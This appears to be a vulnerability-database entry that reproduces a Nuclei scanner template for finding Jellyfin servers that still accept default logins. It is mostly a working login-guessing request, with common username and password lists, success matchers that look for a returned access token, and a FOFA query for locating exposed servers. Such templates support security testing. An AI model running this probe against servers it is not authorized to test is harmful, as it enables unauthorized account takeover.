漏洞描述
Weak Jellyfin credentials were discovered.
jellyfin-default-login: Jellyfin Console - Default Login
PoC代码[已公开]
id: jellyfin-default-login
info:
name: Jellyfin Console - Default Login
author: thefoggiest
severity: high
description: Weak Jellyfin credentials were discovered.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*
metadata:
verified: true
fofa-query: title="Jellyfin"
product: jellyfin
vendor: jellyfin
tags: default-login,jellyfin,misconfig,vuln
http:
- raw:
- |
POST /Users/authenticatebyname HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
X-Emby-Authorization: MediaBrowser Client="Jellyfin Web", Device="Browser", DeviceId="DeviceID", Version="Version"
{"Username":"{{username}}","Pw":"{{password}}"}
payloads:
username:
- admin
- administrator
- jellyfin
password:
- admin
- test
- password
- jellyfin
attack: clusterbomb
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'User":{"Name'
- '"LastLoginDate":'
- 'AccessToken":'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
# digest: 490a004630440220421a731cfd471bdf0171efb49601a5d722502aa417bb9da48a503bc528f38e9602207f334eb81eaf5c0b7d70aa5638aed3c08516c77b6f8eddda904d646e0a66c9d5:922c64590222798bb761d5b6d8e72950